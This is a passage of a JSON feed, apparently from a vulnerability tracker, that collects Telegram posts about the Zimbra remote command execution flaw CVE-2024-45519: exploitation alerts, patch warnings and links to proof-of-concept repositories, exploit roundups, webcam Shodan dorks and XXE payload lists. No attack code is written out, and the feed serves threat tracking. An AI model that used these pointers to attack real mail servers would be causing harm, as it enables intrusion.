\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Assetnote \u043d\u0430\u0448\u043b\u0438\u00a0\u0430\u043d\u043e\u043c\u0430\u043b\u0438\u044e\u00a0\u0432 \u0432\u0435\u043b\u0438\u043a\u043e\u043c \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u043c \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u0435, \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0446\u0438\u0435\u0439 \u043e\u0442\u0432\u0435\u0442\u0430\u043c\u0438 DNS, \u0435\u0441\u043b\u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0437\u0430\u043d\u0435\u0441\u0435\u043d\u043d\u044b\u0435 \u0432 \u0447\u0435\u0440\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u043b\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0441\u043b\u043e\u0432\u0430.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0442\u0430\u043a\u043e\u0435 \u043d\u0435\u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043e \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a DNS poisoning.", "creation_timestamp": "2024-10-01T18:40:05.000000Z"}, {"uuid": "e6928e07-7d96-4766-912a-48a634030c83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/805", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit 
\ud83d\udd2a\n\nExploit\n\n#Poc #cve #exploit \n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-07T15:28:05.000000Z"}, {"uuid": "682e2582-ebce-4f23-a589-89e0b428fa91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/795", "content": "exploit + lab setup for CVE-2024-45519 \ud83d\udd25\n\nGithub\n\n#Cve #Exploit\n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-05T11:18:39.000000Z"}, {"uuid": "f3ccb0c9-668b-41ec-8c3e-f63cba7f5fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ctinow/224425", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-02T12:09:49.000000Z"}, {"uuid": "df3efb8a-592f-4195-a3a9-e5a506224365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9184", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-10-01T19:58:18.000000Z"}, {"uuid": "2d09665d-90a0-44b7-83be-8d8fd2f10c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/thehackernews/5670", "content": "\u26a0\ufe0f Zimbra Collaboration is under attack via a critical vulnerability (CVE-2024-45519) enabling remote command execution. 
\n \nEven without Zimbra\u2019s postjournal enabled, attackers can exploit this flaw with crafted SMTP messages. \n \nLearn more: https://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html", "creation_timestamp": "2024-10-02T07:58:40.000000Z"}, {"uuid": "2b6e09f2-ae63-44ea-919a-91baf71ee64c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/xakep_ru/16495", "content": "\u0425\u0430\u043a\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0443\u044e RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra. 
\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c.\n\nhttps://xakep.ru/2024/10/03/zimbra-cve-2024-45519/", "creation_timestamp": "2024-10-03T16:47:57.000000Z"}, {"uuid": "728b7d00-0b2a-41e9-a622-854a5650090f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9166", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-29T15:35:51.000000Z"}, {"uuid": "f6a17e53-7633-4027-acca-fc3928f1d9d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/25904", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:35.000000Z"}, {"uuid": "f7921ad2-30c3-4ed6-8666-490a7e0c84a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": 
"https://t.me/CyberBulletin/25905", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-04T14:13:33.000000Z"}, {"uuid": "333f3cc2-ff8f-44c1-9438-99e87671058c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11202", "content": "#exploit\n1. CVE-2024-45489:\nArc Browser RCE in JavaScript Boosts\nhttps://kibty.town/blog/arc\n\n2. CVE-2024-44623:\nBlind RCE issue(SPX-GC) in SPX-GC\nhttps://github.com/merbinr/CVE-2024-44623\n\n3. CVE-2024-6769:\nPoisoning the activation cache to elevate from medium to high integrity in Windows 10/11/Srv2019/Srv2022\nhttps://github.com/fortra/CVE-2024-6769\n\n4. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-&gt; https://github.com/p33d/CVE-2024-45519", "creation_timestamp": "2024-11-01T03:20:06.000000Z"}, {"uuid": "dabed7c4-7e36-4090-9b40-502aafdbf30d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3252", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T20:31:34.000000Z"}, {"uuid": "72ef0e9e-00bf-41a1-9ce2-4dffba3e3103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3793", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of 
Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle &amp; Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:01:06.000000Z"}, {"uuid": "57e94046-d125-45c8-b2c2-e2ec55af951e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1066", "content": "Tools - Hackers Factory \n\nMemProcFS-Analyzer - Automated Forensic Analysis of Windows Memory Dumps for DFIR \n\nhttps://github.com/evild3ad/MemProcFS-Analyzer\n\nTeamViewer User to Kernel Elevation of Privilege PoC. CVE-2024-7479 and CVE-2024-7481. ZDI-24-1289 and ZDI-24-1290. TV-2024-1006.\n\nhttps://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481\n\nGet PROXY List that gets updated everyday \n\nhttps://github.com/TheSpeedX/PROXY-List\n\nPrying Deep - An OSINT tool to collect intelligence on the dark web\n\nhttps://github.com/iudicium/pryingdeep\n\nA tool for scanning public or private AMIs for sensitive files and secrets. 
The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs. \n\nhttps://github.com/saw-your-packet/CloudShovel\n\nCVE-2024-45519\n\nhttps://github.com/p33d/CVE-2024-45519\n\nCVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13 \n\nhttps://github.com/pl4int3xt/cve_2024_0044\n\nGoogle &amp; Shodan Dorks for WebCam\n\nhttps://github.com/ExploitXpErtz/WebCam-Google-Shodan-Dorks\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-14T06:00:43.000000Z"}, {"uuid": "ea8f99ad-a9c0-4cc9-bebd-52ba61b02075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/InfoSecInsider/423", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "a00cdefa-ec14-4e45-ad00-a1ad668a5b2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/InfoSecInsider/424", "content": "\u26a1\ufe0fZimbra - Remote Command Execution (CVE-2024-45519).\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:36:08.000000Z"}, {"uuid": "65be7875-7e47-4b2b-8d09-a24688bc9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/474", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! 
\n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:  Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n \nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:33.000000Z"}]}